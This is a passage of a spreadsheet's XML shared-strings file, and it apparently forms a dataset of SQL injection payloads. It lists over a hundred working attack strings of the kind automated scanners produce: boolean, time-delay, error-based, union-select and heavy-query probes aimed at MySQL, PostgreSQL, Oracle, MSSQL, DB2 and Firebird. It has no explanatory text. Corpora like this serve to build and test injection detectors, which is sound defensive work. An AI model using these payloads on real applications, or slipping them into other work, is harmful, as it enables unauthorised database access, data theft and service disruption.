  </si>
  <si>
    <t>1' where 2162 = 2162 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'ucro' where 9912 = 9912 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 'wsmq' = 'wsmq</t>
  </si>
  <si>
    <t>1 and 2006 = 2006</t>
  </si>
  <si>
    <t>1  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) # jpau</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>1" )  as oijn where 1521 = 1521 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' and  ( 3020 = 3020 ) *6703 and 'qsrz' = 'qsrz</t>
  </si>
  <si>
    <t>1  )  )   as hxzh where 9284 = 9284</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-6017 union all select 8449,8449,8449--</t>
  </si>
  <si>
    <t>select  ( case when  ( 8993 = 4660 )  then 1 else 8993* ( select 8993 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-8347%' )  union all select 7643,7643,7643--</t>
  </si>
  <si>
    <t>1"  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "wute" like "wute</t>
  </si>
  <si>
    <t>1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'qfwc' = 'qfwc</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'mnvk' from dual where 4181 = 4181</t>
  </si>
  <si>
    <t>1' in boolean mode )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) #</t>
  </si>
  <si>
    <t>1'  )  )   as qovd where 8865 = 8865 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>-8722%' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )</t>
  </si>
  <si>
    <t>-7041' )  where 6307 = 6307 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>-8612'+ ( select 'iqla' where 5035 = 5035 union all select 5035,5035,5035,5035,5035,5035,5035#</t>
  </si>
  <si>
    <t>1'+ ( select 'ncny' where 5634 = 5634</t>
  </si>
  <si>
    <t xml:space="preserve">1" or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>select * from generate_series ( 7724,7724,case when  ( 7724 = 8170 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>select  ( case when  ( 6859 = 6507 )  then 6859 else 6859* ( select 6859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-1999 )  union all select 1779,1779,1779,1779,1779,1779,1779,1779,1779,1779#</t>
  </si>
  <si>
    <t>1 )  and  ( 7557 = 1711 ) *1711 and  ( 5157 = 5157</t>
  </si>
  <si>
    <t>1"  )  )   as sqzh where 5672 = 5672 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'ctgs' where 6809 = 6809 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   as ovbz where 3203 = 3203  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>-8359 )  where 4430 = 4430 or 6872 = 6872--</t>
  </si>
  <si>
    <t>1' )  as mara where 7164 = 7164</t>
  </si>
  <si>
    <t>1'  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'ican' like 'ican</t>
  </si>
  <si>
    <t>1'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'uwrm' = 'uwrm</t>
  </si>
  <si>
    <t>1' )  as ljpy where 8270 = 8270 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1' where 9024 = 9024 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1" where 4319 = 4319</t>
  </si>
  <si>
    <t>1"  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-8477' union all select 2517,2517,2517--</t>
  </si>
  <si>
    <t xml:space="preserve">-4979'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>1 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1%' )  and make_set ( 8403 = 8403,8899 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1" where 5098 = 5098 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1" where 4064 = 4064 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' )  as kqbh where 6138 = 6138</t>
  </si>
  <si>
    <t>1' )  where 4750 = 4750 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-9209%"  )  )   )  union all select 3736,3736,3736--</t>
  </si>
  <si>
    <t>1" where 9919 = 9919</t>
  </si>
  <si>
    <t>-6778 )  as xutm where 6442 = 6442 union all select 6442,6442,6442,6442,6442,6442#</t>
  </si>
  <si>
    <t xml:space="preserve">-4219' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  ) </t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4236' )  union all select 2076,2076,2076,2076,2076,2076,2076,2076,2076,2076#</t>
  </si>
  <si>
    <t>1'|| ( select 'bhxx' where 2585 = 2585</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>-6236'  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-9462" )  as vzga where 4799 = 4799 or 8691 = 1048</t>
  </si>
  <si>
    <t>1' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( 'ydxb' = 'ydxb</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1305 = 5656,1,1/0 ) </t>
  </si>
  <si>
    <t>1  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 6395 = 6395</t>
  </si>
  <si>
    <t xml:space="preserve">-1043" )  where 4207 = 4207 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( </t>
  </si>
  <si>
    <t>-4262%'  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||c</t>
  </si>
  <si>
    <t>1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'vvkd' like 'vvkd</t>
  </si>
  <si>
    <t>-2190' )  where 8890 = 8890 union all select 8890,8890#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>-8007' where 9649 = 9649 union all select 9649,9649,9649,9649,9649,9649,9649,9649,9649--</t>
  </si>
  <si>
    <t>-7491" )  as cnrn where 3635 = 3635 order by 1#</t>
  </si>
  <si>
    <t>1 )  where 4711 = 4711</t>
  </si>
  <si>
    <t>-1204'  )  )   union all select 3585,3585--</t>
  </si>
  <si>
    <t>1'+ ( select xlvq where 7470 = 7470 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  +'</t>
  </si>
  <si>
    <t>1'+ ( select nsri where 1202 = 1202 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1" )  where 3321 = 3321</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1525'  )  )   )  union all select 4110,4110,4110,4110,4110,4110#</t>
  </si>
  <si>
    <t>1' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'mvkg' = 'mvkg</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select 1 from generate_series ( 8979,8979,case when  ( 8979 = 8979 )  then 1 else 0 end )  limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  </t>
  </si>
  <si>
    <t>1' and 2006 = 2006</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 9134 = 5736,1,1/0 ) </t>
  </si>
  <si>
    <t>1 )  as jqbv where 8172 = 8172 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-9031%" )  order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) </t>
  </si>
  <si>
    <t>1' )  as hqaq where 6411 = 6411 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 )  as mpnj where 5049 = 5049</t>
  </si>
  <si>
    <t>1%' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and '%' = '</t>
  </si>
  <si>
    <t>1' )  as irsh where 4973 = 4973 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-3648' where 4629 = 4629 order by 1--</t>
  </si>
  <si>
    <t>1  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 5199 = 5199</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3287 = 3287 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( "dmcu" = "dmcu</t>
  </si>
  <si>
    <t>1'  )  )   )  waitfor delay '0:0:5' and   (  (   ( 'wvzb' = 'wvzb</t>
  </si>
  <si>
    <t>1' )  as eany where 3169 = 3169 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-9487  )  )   as rvck where 9404 = 9404 or make_set ( 8921 = 6045,6045 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'sjxp' like 'sjxp</t>
  </si>
  <si>
    <t>1" )  as aifd where 5962 = 5962</t>
  </si>
  <si>
    <t>1" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and "dtwv" like "dtwv</t>
  </si>
  <si>
    <t>-4686" )  as dxks where 7123 = 7123 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1' where 2661 = 2661</t>
  </si>
  <si>
    <t>1  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 6578 = 6578</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1  )  )   as zkrr where 4730 = 4730 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'rjun' where 8868 = 8868 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>-8021" )  union all select 1166,1166,1166,1166--</t>
  </si>
  <si>
    <t>-3975' )  or make_set ( 1943 = 3499,3499 )  and  ( 'dawb' = 'dawb</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 2444 = 9282#</t>
  </si>
  <si>
    <t>1" )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "njdu" like "njdu</t>
  </si>
  <si>
    <t xml:space="preserve">-3185'  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 </t>
  </si>
  <si>
    <t>1' in boolean mode )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) #</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 9481 = 9481</t>
  </si>
  <si>
    <t>1%" rlike  ( select  ( case when  ( 5135 = 9839 )  then 1 else 0x28 end  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'lwrk' like 'lwrk</t>
  </si>
  <si>
    <t>-1874" )  as wgpj where 6481 = 6481 or 3629 = 3459</t>
  </si>
  <si>
    <t>-8860 )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>1' where 5778 = 5778</t>
  </si>
  <si>
    <t>1%'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" where 4450 = 4450 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1  )  )   as wwkw where 7289 = 7289 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1"  )  )   as wooq where 7671 = 7671 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1%"  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( "dskh" = "dskh</t>
  </si>
  <si>
    <t>1%' or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  order by 1#</t>
  </si>
  <si>
    <t>1 )  where 1120 = 1120</t>
  </si>
  <si>
    <t>1'qhfy&lt;'"&gt;utwq</t>
  </si>
  <si>
    <t>1  )  )   )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-2605" )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t>select  ( case when  ( 8618 = 8706 )  then 8618 else 8618* ( select 8618 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'bacm' = 'bacm</t>
  </si>
  <si>
    <t xml:space="preserve">-4104%' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  </t>
  </si>
  <si>
    <t>-3082" )  where 1082 = 1082 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||c</t>
  </si>
  <si>
    <t>1%'  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1%' )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1 )  where 9829 = 9829 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and '%' = '</t>
  </si>
  <si>
    <t>1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  -- xgyc</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>if ( 1665 = 3845 )  select 1665 else drop function nzod--</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" where 1140 = 1140 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select * from generate_series ( 6468,6468,case when  ( 6468 = 7999 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1 )  where 5234 = 5234 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 3717 = 3717 )  then 1 else 3717* ( select 3717 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'narn' = 'narn</t>
  </si>
  <si>
    <t xml:space="preserve">1' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'kqqf' = 'kqqf</t>
  </si>
  <si>
    <t>1 )  where 3671 = 3671</t>
  </si>
  <si>
    <t>1'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  'kmjn' = 'kmjn</t>
  </si>
  <si>
    <t>1%" )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1" where 5517 = 5517 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'nets' like 'nets</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'qvrd' = 'qvrd</t>
  </si>
  <si>
    <t xml:space="preserve">-1000" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   </t>
  </si>
  <si>
    <t>1' )  as mmhe where 2142 = 2142 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>-7444  )  )   )  or 1342 = 9774</t>
  </si>
  <si>
    <t>1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'wgbh' = 'wgbh</t>
  </si>
  <si>
    <t>-8654' union all select 7190,7190,7190,7190,7190#</t>
  </si>
  <si>
    <t>-2518' union all select 6818,6818,6818,6818,6818,6818#</t>
  </si>
  <si>
    <t>-5327'  )  )   )  or 1606 = 6099</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-2852%' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1%" and 2006 = 2006</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" where 6325 = 6325 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9136%" )  union all select 3081,3081,3081,3081,3081,3081,3081#</t>
  </si>
  <si>
    <t>-8919" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1' )  as jxqt where 4322 = 4322 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  'rkoe' = 'rkoe</t>
  </si>
  <si>
    <t xml:space="preserve">1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>-8599  )  )   or elt ( 5628 = 2324,2324 )  and   (  (  1134 = 1134</t>
  </si>
  <si>
    <t>-2431' )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>-3596  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 3645 = 3645</t>
  </si>
  <si>
